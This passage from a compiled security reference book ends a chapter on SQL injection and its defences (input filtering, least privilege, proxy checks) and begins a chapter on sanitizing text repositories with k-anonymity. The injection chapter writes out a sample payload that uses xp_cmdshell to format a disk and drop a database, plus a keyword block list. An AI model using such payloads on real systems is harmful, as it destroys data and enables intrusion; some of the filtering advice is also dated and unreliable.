Amongst the more advanced methods used to gain access to Web powered databases is the method of extracting information using time delays. The basic idea is that the attacker can make the SQL query that the database server is in the process of executing pause for a measurable length of time in the middle of execution, on the basis of some criterion. The attacker can therefore issue multiple (simultaneous) queries via SQL code poison through the Web application into the database server and extract information by observing which queries pause and which do not. This technique was used in a practical demonstration across the Internet and achieved, with a satisfactory degree of reliability, a bandwidth of about 1 byte per second (Andrews, Litchfield, Grindlay, & NGS Software, 2003). This technique is a real, practical, but low-bandwidth method of extracting information out of the database. Also, if an SQL code poisoning vulnerability is present in a Web application, the attacker has a wealth of possibilities available to them in terms of system-level interaction. Extended stored functions and procedures provide a flexible mechanism for adding functionality to the DBMS. The various built-in extended functions and procedures allow the database server administrator (DBA) to create scripts that interact closely with the operating system. For example, the extended stored procedure xp_cmdshell executes operating system commands in the context of Microsoft SQL Server (Cerrudo, 2004; Peikary & Fogie, 2003). These functions can be used by an attacker to perform any administrative task on a machine, including administration of the operating system's active (users) directory, the registry, and the Web and data server itself.
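The timing idea can be pictured with a short simulation. The Python sketch below is purely illustrative: the simulated_request function stands in for a Web request whose underlying query has been poisoned with a conditional delay, and no real server or DBMS is involved.

import time

def simulated_request(guessed_condition_holds):
    # Stand-in for a poisoned query that pauses only when the attacker's
    # guessed condition is true; the visible response is identical either way.
    if guessed_condition_holds:
        time.sleep(0.5)
    return "200 OK"

def condition_is_true(guessed_condition_holds, threshold=0.25):
    start = time.perf_counter()
    simulated_request(guessed_condition_holds)
    return (time.perf_counter() - start) > threshold

print(condition_is_true(True))   # True: the slow response leaks one bit of information
print(condition_is_true(False))  # False

Repeating such yes/no questions bit by bit is what yields the roughly 1 byte per second channel reported in the demonstration cited above.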
Protection from SQL Web Hacking

The great popularity and success of the SQL code poisoning attack is based on the fact that malicious users post the attack against the database by using legal entry forms of the Web application. The simplest solution to counter this attack is to check the user's entry for the existence of single quotes in the strings that they type. As the examples discussed above have shown, the majority of code poisoning attacks require the use of single quotes to terminate an expression. However, in
Figure 3. A simple function that filters and removes all single quotes from the data which have been inserted by the user

function escape( input )
    input = replace( input, "'", "" );
    escape = input;
end function;
many applications the developer has to sidestep the potential use of the apostrophe as a way of gaining access to the system by performing a string replace on the input given by the user. Escaping rather than simply rejecting the apostrophe is also useful for valid reasons, for example for being able to enter surnames such as "O'Hara" or "M'Donalds." By using simple replace functions such as the one appearing in Figure 3, which removes all single quotes (or even converts all single quotes to two single quotes), the chance of a code poisoning attack succeeding is greatly reduced. As shown earlier in this chapter, certain characters and character sequences such as "select," "where," "from," "insert," "xp_," and ";" can be used to perform an SQL code poisoning attack. By removing these characters and character sequences from the user input before building a query (see, for example, the validate_string() function in Figure 4a), we can help reduce the chance of a code poisoning attack even further. So if the attacker submits the query:

select Pname from PRODUCTS where Pid=158; xp_cmdshell 'format c: /q /yes '; drop database SYSTEM; --
Figure 4. Functions that (a) identify and remove all known bad entry that can be inserted by the user or (b) identify the "permitted" characters of their input and give permission to those characters only

(a)
function validate_string( input )
    known_bad = array( "select", "insert", "update", "delete", "drop", "shutdown", "--", "'" );
    validate_string = true;
    for i = lbound( known_bad ) to ubound( known_bad )
        if ( instr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then {
            validate_string = false;
            exit function;
        }
end function;

(b)
function validate_password( input )
    good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~@#$%^*(){}[],.?"
    validate_password = true;
    for i = 1 to len( input ) {
        c = mid( input, i, 1 );
        if ( InStr( good_password_chars, c ) = 0 ) then {
            validate_password = false;
            exit function;
        }
    };
end function;
and the known-bad characters and keywords are removed from it before the query is built, what eventually reaches the Microsoft SQL Server environment would look like this:

Pname PRODUCTS Pid=158 cmdshell ''format c: /q /yes '' database SYSTEM

which is basically useless and will return no records from the SQL query. With this method, some care is needed to avoid false rejects, that is, rejecting strings that might seem dangerous but appear in legitimate input, as for example the word "fromage" (cheese), whose first four characters form the harmful keyword "from." Therefore, an additional check of whether an input has the correct format can be performed by using regular expressions. However, while a few troublesome characters can easily be "disallowed," this approach is less than optimal for two reasons: First, a character that is useful to attackers might be missed, and second, there is often more than one way of representing a bad character. For example, an attacker may be able to escape a single quote so that the validation code misses it and passes the escaped quote to the database, which treats it the same way as a normal single quote character. Therefore, a better approach is depicted in Figure 4b, where the validate_password() function identifies the "permitted" characters of the user's entry and gives permission to those characters only. This approach requires more work but ensures a much tighter control on input. A more secure solution would combine the two functions that appear in Figure 4 by checking for dangerous strings after filtering for allowable characters. Regardless of which approach is followed, limiting the permitted length of the user's entry is essential, because some SQL code poisoning attacks require a large number of characters. Also, if the Web application needs to accept a query string value for a product ID or the like, a function (such as the IsNumeric() function for ASP) is always needed to check whether the value is actually numeric. If the value is not
numeric, then either an error or a redirection of the user to another page is suggested, where they can choose a product. Yet again, always posting forms with the method attribute set to POST is required, in order to prevent smart users from getting ideas, as they might if they see form variables tacked onto the end of the URL. Regarding the connection to the database, one of the practices that has to be avoided is the use of a database account with the DBA's privileges. A user with DBA privileges is allowed to do anything in the DBMS: creating logins and dropping databases are just two possibilities. It is sufficient to say that it is a very bad idea to use the DBA (or any high-privileged account) for application database access. It is much better to create a limited-access account and use that instead. This account may run with permission to read the tables of the database only (Breidenbach, 2002). To further reduce the risk of an SQL code poisoning attack, all technical information has to be removed from client-delivered error messages. Error messages often reveal technical details that can enable an attacker to discover vulnerable entry points. It remains an open question whether the problem with SQL code poisoning attacks lies in the input or the output, and one should therefore also filter the output. Also, unused stored procedures, triggers, or user-defined functions need to be removed. Finally, the last but not least important security measure is the encryption of sensitive stored information. Even if the attacker somehow manages to break through the defense, the sensitive information in the database needs to remain secret, and thus encrypted. Candidates for encryption include user personal information, user log-in details, financial information such as credit card details, and so forth.
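A widely used complement to the input filtering described above, though not detailed in this chapter, is to validate the format of each parameter and then pass it to the database as a bound parameter rather than by string concatenation. The minimal Python sketch below uses the standard sqlite3 module and reuses the invented PRODUCTS table from the earlier example.

import sqlite3

def get_product(conn, pid_param):
    # Reject anything that is not a plain integer before it is used.
    if not pid_param.isdigit():
        raise ValueError("invalid product id")
    # The bound parameter is sent as data, so it can never change the
    # structure of the SQL statement.
    return conn.execute(
        "SELECT Pname, Pdetails FROM PRODUCTS WHERE PID = ?",
        (int(pid_param),),
    ).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE PRODUCTS (PID INTEGER, Pname TEXT, Pdetails TEXT)")
conn.execute("INSERT INTO PRODUCTS VALUES (158, 'Keyboard', 'Wireless')")

print(get_product(conn, "158"))  # [('Keyboard', 'Wireless')]
try:
    get_product(conn, "158 or 1=1")
except ValueError as error:
    print("rejected:", error)    # the poisoned value never reaches the database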
Software Tool Solutions

One way of checking whether a Web application is vulnerable to SQL code poisoning attacks is
with the use of specialized software that is able to automatically scan the entire Web application for vulnerabilities to SQL code poisoning. This software will indicate which URLs or scripts are vulnerable to an SQL code poisoning attack so that the developer can fix the vulnerability easily. Besides SQL code poisoning vulnerabilities, a Web application scanner may also check for cross-site scripting and other Web vulnerabilities. In order to check whether the execution of an SQL statement is authorized or not, a proxy server is needed to intercept the SQL statement that is being executed. To check whether an SQL statement is allowed, the proxy driver will normalize the SQL statement and search to determine whether this statement already exists in a ready-sorted list. If the normalized SQL statement does exist, the SQL execution will be allowed only if the variables are within their expected values. If the normalized SQL statement is not in the permitted list, the system checks against another user-supplied list of regular expressions. If the normalized SQL statement does not match any regular expression on this list, the SQL execution will be blocked. This semi-secure architecture is illustrated in Figure 5 and allows the system to handle exceptional cases that might not be compatible with the current algorithm of variable normalization. Since the system checks against the regular expression list after variable normalization, attackers should not be able to bypass the authorization process. And since most SQL statements do not need to be matched against
the regular expression list, the performance impact should be minimal. Finally, there are automatic tools that protect from SQL code poisoning by randomizing the SQL statements, creating instances of the language that are unpredictable to the attacker (Boyd & Keromytis, 2004). They also run as proxy servers.
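The normalization step described above can be pictured with a small sketch. The Python fragment below is only an illustration of the idea; the regular expressions and the permitted-template list are simplifications invented for the example and do not reflect the behaviour of any particular tool.

import re

def normalize(sql):
    # Replace string and numeric literals with placeholders so that
    # structurally identical statements share one template.
    sql = re.sub(r"'[^']*'", "?", sql)
    sql = re.sub(r"\b\d+\b", "?", sql)
    return re.sub(r"\s+", " ", sql).strip().lower()

PERMITTED_TEMPLATES = {
    normalize("SELECT Pname, Pdetails FROM PRODUCTS WHERE PID = 158"),
}

def is_authorized(sql):
    return normalize(sql) in PERMITTED_TEMPLATES

print(is_authorized("SELECT Pname, Pdetails FROM PRODUCTS WHERE PID = 42"))         # True
print(is_authorized("SELECT Pname, Pdetails FROM PRODUCTS WHERE PID = 42 or 1=1"))  # False

A poisoned statement changes the structure of the query, so its normalized form no longer matches any permitted template and, in the architecture of Figure 5, it would then be checked against the regular expression list or blocked.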
FUTURE TRENDS

There are still a variety of problems to be solved in order to come up with a system that can protect the full range of potential applications from SQL code poisoning attacks in a secure fashion. The most notable omission in the list of solutions was an answer to the question of how to support multithreaded applications. We are not aware of any system tool that has addressed this problem. Another important improvement would be to provide network-based intrusion detection tools (Axelsson, 2000; Wagner & Dean, 2001) with the ability to detect all known types of SQL code poisoning attacks, both at the HTTP protocol layer and at the database connection (Mookhey & Burghate, 2003).

CONCLUSION

SQL code poisoning attacks are a serious concern for Web application developers, as they can be used to break into supposedly secure systems and steal,
Figure 5. A semi-secure architecture for protection from SQL code poisoning attacks
[Diagram: a client connects through a proxy server acting as an SQL code poisoning examination center (middleware) in front of the original data server]
alter, or destroy sensitive data. Unfortunately, the security model used in many Web applications assumes that an SQL query is a trusted command. This enables attackers to exploit SQL queries to circumvent access controls, authentication, and authorization checks. In some instances, SQL queries may also allow access to host operating system level commands. How to perform the SQL code poisoning attack by using Web applications’ forms or URLs and how to prevent it by securing the input provided by the user have been shown. The best way to provide a defense against SQL code poisoning attack is to filter extensively any input that a user may type and “remove everything but the known good data.” This will ensure that only what should be entered in the field will be submitted to the server. However, it is not always possible to guard against every type of SQL code poisoning attack. In any case, it is required that the developer be informed of the various types of attacks in order to be able to plan ways to fight them. Sensitive to SQL code poisoning are the Oracle database, IBM DB2, Microsoft SQL server, MySQL, PostgreSQL to mention but a few database servers. In other words, SQL code poisoning is a real threat and no DBMS is safe from, or invulnerable to this attack.
REFERENCES

Andrews, C., Litchfield, D., Grindlay, B., & NGS Software. (2003). SQL server security. McGraw-Hill/Osborne.

Anupam, V., & Mayer, A. (1998). Security of web browser scripting languages: Vulnerabilities, attacks, and remedies. In Proceedings of the 7th USENIX Security Symposium (pp. 187-200).

Axelsson, S. (2000). Intrusion detection systems: A survey and taxonomy (Tech. Rep. No. 99-15). Chalmers University.
Boyd, S., & Keromytis, A. (2004, June 8-11). SQLrand: Preventing SQL injection attacks. In Proceedings of the Second Applied Cryptography and Network Security (ACNS) Conference, Yellow Mountain, China (LNCS 2121, pp. 292-302). Heidelberg, Germany: Springer-Verlag.

Breidenbach, B. (2002). Guarding your website against SQL injection attacks (e-book). Apress.

Cerrudo, C. (2004). Manipulating Microsoft SQL server using SQL injection (Tech. Rep.). Application Security, Inc.

CERT. (2002). CERT vulnerability note VU#282403. Retrieved from http://www.kb.cert.org/vuls/id/282403

Mookhey, K. K., & Burghate, N. (2003). Detection of SQL injection and cross-site scripting attacks (Tech. Rep.). Retrieved from http://www.securityfocus.com/infocus/1768

Peikary, C., & Fogie, S. (2003). Guarding against SQL server attacks: Hacking, cracking and protection techniques (Tech. Rep.). AirScanner.

Spett, K. (2002). SQL injection: Is your Web application vulnerable? (Tech. Rep.). SPI Dynamics Inc.

Theriault, M., & Newman, A. (2001). Oracle security handbook. In Firewalls and Oracle. Osborne/McGraw-Hill.

Wagner, D., & Dean, D. (2001). Intrusion detection via static analysis. In Proceedings of the IEEE Symposium on Security and Privacy, Washington, DC (pp. 156-169).
KEY TERMS

Anomaly Detection: This is the process of using specialized software to examine computer log files and discover information or activity that are
out of place, and thus suspicious. It usually seeks only to identify all "known good" behaviours and assumes that everything else is bad. It has the potential to detect attacks of all kinds, including "unknown" attacks on custom code.

Cookie Poisoning: Is the modification of a cookie (which is personal information in a Web user's computer) by an attacker to gain unauthorized information about the user. The attacker may use the information to open new accounts or to gain access to the user's existing Web accounts. To guard against cookie poisoning, Web applications that use them need to protect cookies (through encryption, for example) before they are sent to a user's computer.

CRLF Injection Attack: The term CRLF stands for Carriage Return (CR, ASCII 13 or '\r') Line Feed (LF, ASCII 10 or '\n'). These are ASCII characters which display nothing on screen but are very widely used in Windows to indicate the end of a line. On UNIX systems the end of a line is indicated by the use of the Line Feed only. A CRLF injection attack occurs when a hacker manages to inject CRLF commands into the system. This kind of attack is not a technological security hole in the operating system or server software, but rather it depends on the way that a Web application is developed. Some developers are unaware of this kind of attack and leave open doors when developing Web applications, allowing hackers to inject CRLF commands.

Cross-Site Scripting (or CSS) Attack: Cross-site scripting generally occurs when a dynamic Web page gathers malicious data from a user and displays the input on the page without it being properly validated. The data is usually formatted in the form of a hyperlink, which contains malicious content within it and is distributed over any possible means on the Internet.

Database Administrator (DBA): Is an individual responsible for the planning, implementation, configuration, and administration of DBMSs. The DBA has permission to run any command that may be executed by the DBMS and is ordinarily responsible for maintaining system security, including access by users to the DBMS itself and performing backup and restoration functions.

Database Management System (DBMS): Is a software package used to create and maintain databases. It provides a layer of transparency between the physical data and application programs.

Database Structured Query Language (SQL): Is the standardized query language for accessing, querying, updating, and managing data from a relational DBMS. The original version called SEQUEL (Structured English QUEry Language) was designed by an IBM research center in 1975.

Directory Traversal Attack: Is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the Web server's root directory. With a system vulnerable to directory traversal attack, an attacker can step out of the root directory and access other parts of the file system. This might give the attacker the ability to view restricted files, or even more dangerous, allow the attacker to execute powerful commands on the Web server which can lead to a full compromise of the system. Depending on how the Web site access is set up, the attacker will execute commands by impersonating themselves as the user which is associated with "the Web application." Therefore it all depends on what the Web application user has been given access to in the system.

Google Hacking Attack: Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although the Google search engine blocks some of the well known Google hacking queries, nothing stops a hacker from crawling a Web application and launching the Google
Hacking Database queries directly onto the crawled content. The Google Hacking Database is located at http://johnny.ihackstuff.com/index. php?module=prodreviews Secrecy; Integrity; and Availability: These are the three most important security services which ensure respectively that (a) sensitive stored information is kept hidden from others; (b) modifications to it are detectable; and, finally,
(c) information is accessible and useable upon demand by an authorized person. SQL Code Poisoning (or SQL Injection) Attack: Is a form of attack on a database-driven Web application that comes from user entry that has not been checked to see whether it is valid. The objective is to poison the database system by running malicious code that will reveal sensitive information or otherwise compromise the server.
This work was previously published in Cyber Warfare and Cyber Terrorism, edited by L. Janczewski and A. Colarik, pp. 161171, copyright 2008 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 7.10
Sanitization and Anonymization of Document Repositories

Yücel Saygin
Sabanci University, Turkey

Dilek Hakkani-Tür
AT&T Labs—Research, USA

Gökhan Tür
AT&T Labs—Research, USA
ABSTRACT

Information security and privacy in the context of the World Wide Web (WWW) are important issues that are still being investigated. However, most of the present research is dealing with access control and authentication-based trust. Especially with the popularity of WWW as one of the largest information sources, privacy of individuals is now as important as the security of information. In this chapter, our focus is text, which is probably the most frequently seen data type in the WWW. Our aim is to highlight the possible threats to privacy that exist due to the availability of document repositories and sophisticated tools to browse and analyze these documents. We first identify possible threats to privacy in document
repositories. We then discuss a measure for privacy in documents with some possible solutions to avoid or, at least, alleviate these threats.
INTRODUCTION

Information has been published in various forms throughout history, and sharing information has been one of the key aspects of development. The Internet revolution and the World Wide Web (WWW) made publishing and accessing information much easier than it used to be. However, widespread data collection and publishing efforts on the WWW have increased privacy concerns, since most of the gathered data contain private information. Privacy of individuals on the WWW
may be jeopardized via search engines and browsers or sophisticated text mining tools that can dig through mountains of Web pages. Privacy concerns need to be addressed since they may hinder data collection efforts and reduce the number of publicly available databases that are extremely important for research purposes in fields such as machine learning, data mining, information extraction/retrieval, and natural language processing. In this chapter, we consider the privacy issues that may originate from publishing data on the WWW. Since text is one of the most frequently and conveniently used media on the WWW for conveying information, our main focus will be text documents. We basically tackle the privacy problem in two phases. The first phase, referred to as sanitization, aims to protect the privacy of the contents of the text against possible threats. Sanitization basically deals with the automatic identification of named entities such as sensitive terms, phrases, proper names, and numeric values (e.g., credit card numbers) in a given text, and with modifying them for the purpose of hiding private information. The second phase, called anonymization, makes sure that classification tools cannot predict the owner or author of the text. In the following sections, we first provide a taxonomy of possible threats. In addition, we propose a privacy metric for document databases based on the notion of k-anonymity, together with a discussion of the methods that can be used for preserving privacy.
BACKGROUND AND RELATED WORK

Privacy and security issues were investigated in the database community in the context of statistical databases, where the users are limited to statistical queries. In statistical databases, privacy is protected by limiting the queries that can be
issued by the user to non-confidential values, or statistical operations (Adam & Wortmann, 2004). Security leaks resulting from the intersection of multiple queries are investigated, and privacy is defined by the concept of k-anonymity. A database table provides k-anonymity if it cannot be used to unambiguously identify less than k entities (Samarati & Sweeney, 1998). Currently, the data mining community is investigating how data could be mined without actually seeing the confidential values. This is called privacy preserving data mining which was introduced in Agrawal and Srikant (2000) for the case of classification model construction. Further research results have been published on various data mining models for preserving privacy (Evfimievski, Srikant, Agrawal, & Gehrke, 2002; Rizvi & Haritsa, 2002). Privacy preserving data mining on distributed data sources was another interesting research direction, which was addressed in Clifton and Kantarcioglu (2004) and Vaidya and Clifton (2004) for association rule mining and classification model construction. Another aspect of privacy issues in data mining is to protect the data against data mining algorithms. This result is due to the fact that data mining tools can be used to discover sensitive information. Hiding sensitive association rules by database sanitization is proposed in Saygin et al. (2001) and Verykios et al. (2004). Further research was conducted for data sanitization to protect the data against data mining tools (Oliveira & Zaïane, 2002, 2003). However, there is not much work about preserving privacy for natural language databases and its effects, except the studies of Ruch et al. (2000) and Sweeney (1996) who have worked on sanitization of medical reports on a limited domain. On the other hand, information extraction (IE) has been studied extensively in the natural language processing community. IE is the task of extracting particular types of entities, relations, or events from natural language text or speech. The notion of what constitutes information extraction has been heavily influenced by the
Message Understanding Conferences (MUCs). The basic information extraction task of Named Entity Extraction covers marking names—and determining their types as persons, locations, or organizations—and certain structured expressions—money, percent, date, and time (Hakkani-Tur et al., 1999). An example text from the Broadcast News, whose named entities are marked, is given in Figure 1. These entities can also be marked using XML tags. It may also be useful to make HTML links of entities and coreferencing pronomials, which point to pages where summary information about the entity such as the gender of a person or further references in the text, can be listed. A task related to information extraction is the automatic authorship identification, which aims to assign authors to texts. This topic is studied mainly in linguistics, computational linguistics, and stylometrics fields beginning in the precomputer era (Oakes, 1998). Commonly used features include vocabulary of the author, usage of some typical words (mostly stopwords) and phrases, and construction style of sentences (e.g., average sentence length, part of speech tags in the first words of the sentences, most common voice, etc.). In our previous work, we have found that using just the word (unigram) frequencies, it is possible to detect the author of a newspaper article by more than 90% accuracy when the candidate set is fixed to nine authors and using about 100,000 words per author for training (Tur, 2000).
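To illustrate the kind of model such studies rely on, the short Python sketch below scores a text against per-author unigram frequency models with simple add-one smoothing. The two toy "authors" and their training words are invented for the example; the cited study used real newspaper articles and on the order of 100,000 words per author.

import math
from collections import Counter

training = {
    "author_a": "the market rallied today as investors welcomed the upbeat earnings report".split(),
    "author_b": "the striker scored twice and the home crowd celebrated the late winner".split(),
}

models = {author: Counter(words) for author, words in training.items()}
totals = {author: sum(counts.values()) for author, counts in models.items()}

def most_likely_author(text):
    scores = {}
    for author, counts in models.items():
        vocabulary_size = len(counts)
        score = 0.0
        for word in text.lower().split():
            # Add-one smoothing keeps unseen words from zeroing out the score.
            score += math.log((counts[word] + 1) / (totals[author] + vocabulary_size))
        scores[author] = score
    return max(scores, key=scores.get)

print(most_likely_author("investors welcomed the earnings report"))  # author_a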
PRIVACY THREATS IN DOCUMENTS

Privacy issues in document repositories arise from the fact that the text contains private information, which can be jeopardized by adversaries who are curious to know more about individuals for various reasons. Adversaries could turn this information to their advantage, as in the case of private information that may be published in a tabloid. Since our main concern is document repositories, the main elements we are going to consider are documents as information sources. There are also what we call Privacy Conscious Entities (PCEs) whose privacy may be jeopardized by the release of the documents. A PCE could be a person, company, or organization. Privacy concerns of PCEs may require that identifying information of the PCE (person name, company name, etc.) should not appear in a document because the document is related to a sensitive topic. A PCE may not want to be seen as the author of a document, or to appear in a document in a certain context, such as being a criminal or being in debt. A PCE may not want to be associated with another entity, for example as the friend of a convict. In doing so, the links between documents, such as references or hyperlinks to a document, should also be taken into account. The private information in a text can be grouped into two classes, namely, explicit and implicit information. Explicit information could be the name, salary, or address of a person that
Figure 1. An example text from the Broadcast News corpus. Named entities are marked: bold for dates, italics for locations, underlines for organizations, and gray for person names

…The other very big story of the day today is in Washington where the White House administration has already been badly shaken up by the possibility that president Clinton and one of his advisors Vernon Jordan obstructed justice…
Table 1. Relationships among privacy threats, private information, and tools for extracting private information

Type of private information | Tools that can be used by the adversary | Type of threat
Explicit | Browsers, Editors | Direct
Implicit | Record Matching, Information Retrieval | Indirect via Data Integration
Implicit | Data Mining, Statistical Analysis | Indirect via Data Analysis
could be viewed by text editors, browsers, and can be found by search engines. Implicit information could be the characteristics of a document such as the author, the statistical properties like the frequencies of some words and punctuation marks, or usage of particular phrases that can be identified with an individual. Data mining and statistics tools are needed to reach such information. In Table 1, we listed the type of private information that could be obtained by an adversary, the tools that could be used for the corresponding private information type, and the type of threat. As shown in Table 1, we classify the privacy threats as direct and indirect. Direct threats occur due to the existence and availability of explicit information in the data such as the name of the person including some extra information regarding the salary of that person. Names of individuals, phone numbers, and salary amounts are just a few examples forming a direct threat to privacy when they are revealed to a third party. Upon the disclosure of the text data, users can see the contents using a browser or an editor. Indirect threats can be of two kinds: one is due to data integration, and the other is caused by data analysis. The former type of indirect threat is the integration of different documents in order to infer private information that cannot be revealed by each individual document when considered alone. The integration can be achieved by finding those documents that are considered “similar” based on the similarity measures defined in the context of information
retrieval (Cohen, 2000). Indirect threats via data analysis, instead, are due to the application of machine learning and data mining techniques over the available data. New data mining tools, especially for text classification, can be used with a training database (which is easy to construct from news groups, etc.) to infer private information such as the author of a document.
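The similarity-based linking behind the data integration threat can be illustrated with a standard information retrieval measure. The tiny Python sketch below computes the cosine similarity of two word-count vectors; the two example sentences are invented, and a real adversary would work with full documents and richer weighting schemes such as tf-idf.

import math
from collections import Counter

def cosine_similarity(text_a, text_b):
    a, b = Counter(text_a.lower().split()), Counter(text_b.lower().split())
    dot = sum(a[word] * b[word] for word in set(a) & set(b))
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0

hospital_note = "mr john brown was admitted to the emergency service on 05/05/1999"
press_item = "local resident john brown was admitted to hospital last week"
print(round(cosine_similarity(hospital_note, press_item), 2))

A high score between two documents that each look harmless on their own is exactly what allows an adversary to integrate them and recover private information.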
PRESERVING PRIVACY IN DOCUMENTS

In this section, we first propose a measure for privacy in document repositories using the notion of k-anonymity. We then address the privacy problem in two phases. The former phase is called sanitization. It deals with the automatic extraction of named entities such as sensitive terms, phrases, proper names, and numeric values from a given text. Extracted terms are then replaced with dummy values, or more generic terms, depending on the privacy requirements. The latter phase, known as anonymization, makes sure that classification tools cannot predict the owner or author of the text. We should note that all the sanitization and anonymization techniques can be applied to spoken language as well. For example, in the case of anonymization, the purpose may be to hide the identity of the speaker.
k-Anonymity as a Privacy Measure in Documents Privacy in documents can be assessed using the notion of k-anonymity that has been heavily investigated in the context of statistical disclosure control (Samarati & Sweeney, 1998). k-anonymity is related to the identification of entities (individuals, companies, etc.) in released data where the confidential attributes are hidden [15, 19]. For example, the data in a hospital regarding patients that includes the patient name, surname, social security number (SSN), postal code (ZIP), birth date, sex, diagnosis, and the medication should not be disclosed without removing the name, surname, and SSN columns which identify a person. However, when we remove the name, surname, and SSN, one may think that ZIP, birth date, sex, diagnosis, and the medication can be safely released without the risk of privacy violation. It turns out that this is not the case because when combined with publicly available data such as a voter list, we may recover the SSN, name, and surname information from the voter list database using the ZIP, birth date, and sex columns from the released data. In tabular data sources, a set of attributes (such as the ZIP, birth date, and sex) is called quasi-identifier if it could be used in connection with public data to identify a person (Sweeney, 1996). Quasi-identifiers are used as a base for measuring the anonymity provided by the released data with respect to publicly available data sources. The degree of anonymity is called k-anonymity in general, and it is formally defined in Sweeney (1996) for tabular data as follows:
Definition (k-anonymity). Let T(A1, A2, …, An) be a table with attributes A1 through An, and let QI be a quasi-identifier associated with it. T is said to satisfy k-anonymity with respect to QI if and only if each sequence of values in T[QI] appears with at least k occurrences in T[QI], where T[QI] denotes the projection on the attributes of QI, maintaining duplicates.
The k-anonymity property ensures that the disclosed data cannot be used to narrow a person down to a group of fewer than k individuals. In the relational data model, which has been heavily adopted by statistical database researchers, the data is structured; the attribute values related to an individual are therefore in the same row, clearly identifying their relationship to that individual. In the case of unstructured text, however, a major issue is finding the terms that identify an individual or that are related to an individual. Similar to the definition in Sweeney (2002), we define the set of named entities that relate to the same individual, and that can be used to identify that individual in connection with other publicly available text, as quasi-identifier named entities. Quasi-identifier named entities can be dates, sex, addresses, and so on. We need to make sure that these terms cannot be used to differentiate between entities within a set of size k. In the case of authorship detection, to provide k-anonymity we need to make sure that the author of a document cannot be identified among fewer than k authors. We define k-anonymity of the authorship of a document as follows:
Definition (k-anonymity of authorship). Let DP be a set of documents whose authors are known, DC be a set of documents whose authorship is confidential, and A be the set of authors of the documents in DP ∪ DC. A document di ∈ DC satisfies k-anonymity of authorship with respect to DP if DP cannot be used to form a prediction model that reduces the set of possible authors of di to a set AP, where AP ⊆ A and |AP| < k.
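To make the tabular definition concrete, the following small Python sketch (our own illustration with hypothetical column names and data, not part of any of the systems discussed here) checks whether a released table satisfies k-anonymity with respect to a given quasi-identifier.

from collections import Counter

def satisfies_k_anonymity(rows, quasi_identifier, k):
    """Return True if every combination of quasi-identifier values
    occurs in at least k rows of the table."""
    counts = Counter(tuple(row[attr] for attr in quasi_identifier) for row in rows)
    return all(count >= k for count in counts.values())

# Hypothetical released hospital data (identifying columns already removed).
released = [
    {"zip": "47906", "birth_date": "1965-03-12", "sex": "F", "diagnosis": "flu"},
    {"zip": "47906", "birth_date": "1965-03-12", "sex": "F", "diagnosis": "asthma"},
    {"zip": "47907", "birth_date": "1971-08-02", "sex": "M", "diagnosis": "flu"},
]

print(satisfies_k_anonymity(released, ["zip", "birth_date", "sex"], 2))
# False: the third record is unique with respect to the quasi-identifier.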
Text Sanitization
The aim of sanitization is to protect the privacy of individuals given their privacy requirements. The first step of the sanitization process is to extract personally identifying information, such as a person's name or SSN, or the company name if we would like to protect the privacy of a company. However, spotting the personally identifying
information may not be enough; we also need to find the quasi-identifier named entities, such as the ZIP, birth date, and gender, that could be used to identify individuals by linking to other documents. The appropriate sanitization method depends on the task at hand. There are three known methods for partial access to databases (Conway & Strip, 1976), which can also be used for sanitization (a small illustrative sketch follows this list):
1. Value distortion alters the confidential values to be hidden with random values.
2. Value dissociation keeps these values but dissociates them from their actual occurrence. This can be achieved, for example, by exchanging the values across sentences.
3. Value-class membership exchanges the individual values with disjoint, mutually exhaustive classes. For example, all the proper names can be changed to a single token, Name.
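The following Python sketch roughly illustrates the value-class membership approach; the regular expressions are simplistic, hypothetical stand-ins for a real named entity extractor, which would be considerably more robust.

import re

# Hypothetical, overly simple patterns; a production system would use a
# trained named entity extractor instead of regular expressions.
PATTERNS = [
    (re.compile(r"\b\d{3}-\d{2}-\d{4}\b"), "<SSN>"),
    (re.compile(r"\b\d{2}/\d{2}/\d{4}\b"), "<DATE>"),
    (re.compile(r"\b(?:Mr\.|Mrs\.|Dr\.)\s+[A-Z][a-z]+\b"), "<NAME>"),
]

def sanitize(text):
    """Replace matched named entities with a single generic token per class."""
    for pattern, token in PATTERNS:
        text = pattern.sub(token, text)
    return text

print(sanitize("Dr. Green admitted Mr. Brown on 05/05/1999, SSN 123-45-6789."))
# -> "<NAME> admitted <NAME> on <DATE>, SSN <SSN>."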
The simplest form of sanitization is modifying the values of named entities or replacing them with generic tokens as in the value-class membership approach. If the named entities are not already marked using XML tags, we can utilize automatic named entity extraction methods, which are well studied in the computational linguistics
community. The concept of k-anonymity can be enforced during text sanitization when the generic tokens are determined. For example, people's names can be generalized until they map to at least k people. For numeric values such as a salary, a concept hierarchy can be exploited: the salary can be mapped to a more generic value in the concept hierarchy (e.g., the linguistic hedges low, average, high, and astronomic) that refers to at least k people in a specific context, even when quasi-identifier information is used. For addresses, we can ensure that the address maps to k different people in the company, or to a district in which at least k distinct addresses exist. The generic tokens can also preserve non-sensitive information to keep the text readable. For example, the gender or an identifier of a person can be marked in the token for the resolution of further (pronominal) references (e.g., distinct tokens for male and female names). An even harder task would be associating references during sanitization, as in the example below, where the token replacing the patient's full name is also used for later references to his surname. A sample text and its sanitized version are provided in Figure 2.

Figure 2. A modified example text from a medical record (Tur et al., 1999) and its sanitized version. Original text: "Dear Dr. Blue, Your patient, Mr. John Brown, stayed in our service from 05/05/1999 to 05/08/1999. Mr. Brown, 72 years old, has been admitted to emergency on 05/05/1999. His tests for the cytomegalovirus and the EBV were negative. Therefore, Dr. George Green performed an abdominal CT scan. Mr. Brown will be followed in ambulatory by Dr. Green…" Sanitized version: the same text with each doctor name, patient name, and date replaced by a generic token.

Another example is the task of automatic call classification, which is an emerging technology for automating call centers. During the development of call routing systems, previous customer
